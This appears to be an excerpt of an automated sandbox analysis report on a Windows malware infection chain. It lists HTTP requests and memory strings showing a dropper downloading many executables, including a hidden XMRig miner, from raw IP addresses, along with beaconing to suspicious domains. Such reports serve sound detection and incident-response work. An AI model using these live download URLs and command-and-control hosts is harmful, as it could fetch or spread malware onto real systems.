                          Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/a60ae169-71b6-4ff4-95a3-536733a417a3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250313%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250313T070912Z&X-Amz-Expires=300&X-Amz-Signature=1f4899236d229a08f0fc5e683cadf260c265bd9762f334088a5639b9cf80dd66&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-hidden.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeAccept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /files/6142491850/s7MG2VL.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: GET /files/7033027882/ZqkKpwG.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: GET /files/8061344923/eAzoDbY.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: GET /app/8sb9w_003.exe HTTP/1.1Host: 107.174.192.179
                          Source: global trafficHTTP traffic detected: GET /files/809453437/yo7qmvz.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: GET /data/003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                          Source: global trafficHTTP traffic detected: GET /clean HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                          Source: global trafficHTTP traffic detected: GET /files/1482809150/st22BJg.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1179647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1179648-1310719User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1310720-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-1966079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1966080-2228223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2228224-2490367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2490368-2752511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2752512-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-3801087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3801088-4063231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4063232-4587519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4587520-5111807User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5111808-5606383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /files/6003232782/EZs3CZC.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: GET /files/2043702969/dx3hXS1.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                          Source: global trafficDNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
                          Source: global trafficDNS traffic detected: DNS query: citydisco.bet
                          Source: global trafficDNS traffic detected: DNS query: jowinjoinery.icu
                          Source: global trafficDNS traffic detected: DNS query: grabify.link
                          Source: global trafficDNS traffic detected: DNS query: crosshairc.life
                          Source: global trafficDNS traffic detected: DNS query: github.com
                          Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                          Source: unknownHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: citydisco.bet
                          Source: ps.exe, 00000026.00000003.2175690155.00000000026C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1
                          Source: ps.exe, 00000026.00000002.2200704202.00000000026A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d14
                          Source: ps.exe, 00000026.00000002.2200704202.00000000026A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d17
                          Source: ps.exe, 00000026.00000003.2171813616.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2173387975.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000002.2201192070.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2171373397.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2175690155.00000000026C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1C
                          Source: ps.exe, 00000026.00000002.2200704202.00000000026A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1F
                          Source: ps.exe, 00000026.00000003.2171813616.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2173387975.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000002.2201192070.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2171373397.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2175690155.00000000026C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1I
                          Source: ps.exe, 00000026.00000002.2200423469.0000000002353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1INEER-PC
                          Source: ps.exe, 00000026.00000002.2200704202.00000000026A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1O
                          Source: ps.exe, 00000026.00000003.2171813616.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2173387975.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000002.2201192070.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2171373397.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2175690155.00000000026C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1V
                          Source: ps.exe, 00000026.00000003.2171813616.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2173387975.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000002.2201192070.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2171373397.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2175690155.00000000026C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1_
                          Source: ps.exe, 00000026.00000002.2200704202.00000000026A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1m
                          Source: ps.exe, 00000026.00000003.2171813616.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2173387975.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000002.2201192070.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2171373397.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2175690155.00000000026C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1o
                          Source: ps.exe, 00000026.00000003.2171813616.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2173387975.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000002.2201192070.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2171373397.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2175690155.00000000026C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1r
                          Source: ps.exe, 00000026.00000003.2171813616.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2173387975.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000002.2201192070.00000000026C5000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2171373397.00000000026C4000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000003.2175690155.00000000026C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1x
                          Source: ps.exe, 00000026.00000002.2200704202.00000000026A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1y
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.192.179/app/8sb9w_003.exe
                          Source: 8sb9w_003.exe, 0000001C.00000002.2039039883.0000000000475000.00000004.00000001.01000000.00000011.sdmp, svchost.exe, 0000001F.00000002.2470240834.000001DBE27AF000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2470240834.000001DBE27B3000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2477479962.000001DBE480F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2477479962.000001DBE4806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.192.179/clean
                          Source: 8sb9w_003.exe, 0000001C.00000002.2039039883.0000000000475000.00000004.00000001.01000000.00000011.sdmp, svchost.exe, 0000001F.00000002.2470240834.000001DBE27AF000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2470240834.000001DBE27B3000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2477479962.000001DBE480F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2477479962.000001DBE4806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.192.179/data/003
                          Source: rapes.exe, 0000000B.00000002.2491465283.00000000061F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://156.229.233.194:8080/mio.exe
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
                          Source: rapes.exe, 0000000B.00000002.2476906113.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php-
                          Source: rapes.exe, 0000000B.00000002.2476906113.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php;
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.e
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.ef;
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.exe
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.exe.v=9
                          Source: rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.exe1a
                          Source: rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.exe1dac1.exe
                          Source: rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.exe1dac97d7a
                          Source: rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.exe1dac97d7aeN
                          Source: rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.exe1dac97d7aee7f
                          Source: rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.exects
                          Source: rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1203326979/0aA3omN.exex3hXS1.exe4
                          Source: rapes.exe, 0000000B.00000003.2388099830.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1482809150/st22BJg.exe
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1482809150/st22BJg.exe1dac97d7aee7f
                          Source: rapes.exe, 0000000B.00000003.2388099830.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/1482809150/st22BJg.exem
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/2043702969/dx3hXS1.exe
                          Source: rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/2043702969/dx3hXS1.exeQ
                          Source: rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/2043702969/dx3hXS1.exeU
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/2043702969/dx3hXS1.exeb
                          Source: rapes.exe, 0000000B.00000003.2387974996.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2388099830.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6003232782/EZs3CZC.exe
                          Source: rapes.exe, 0000000B.00000002.2476906113.000000000135F000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.000000000130B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6142491850/s7MG2VL.exe
                          Source: rapes.exe, 0000000B.00000002.2476906113.000000000130B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6142491850/s7MG2VL.exe86)=C:
                          Source: rapes.exe, 0000000B.00000002.2476906113.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6142491850/s7MG2VL.exex
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7033027882/ZqkKpwG.exe
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7033027882/ZqkKpwG.exeg
                          Source: rapes.exe, 0000000B.00000003.2388099830.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/8061344923/eAzoDbY.exe
                          Source: rapes.exe, 0000000B.00000003.2388099830.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/8061344923/eAzoDbY.exe5
                          Source: rapes.exe, 0000000B.00000003.2388099830.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.00000000013BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/809453437/yo7qmvz.exe
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2469842738.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2469842738.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/SaWLYV2xvlI.crl0
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: powershell.exe, 0000002A.00000002.2445406706.000002036633A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                          Source: powershell.exe, 0000002A.00000002.2445406706.000002036633A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
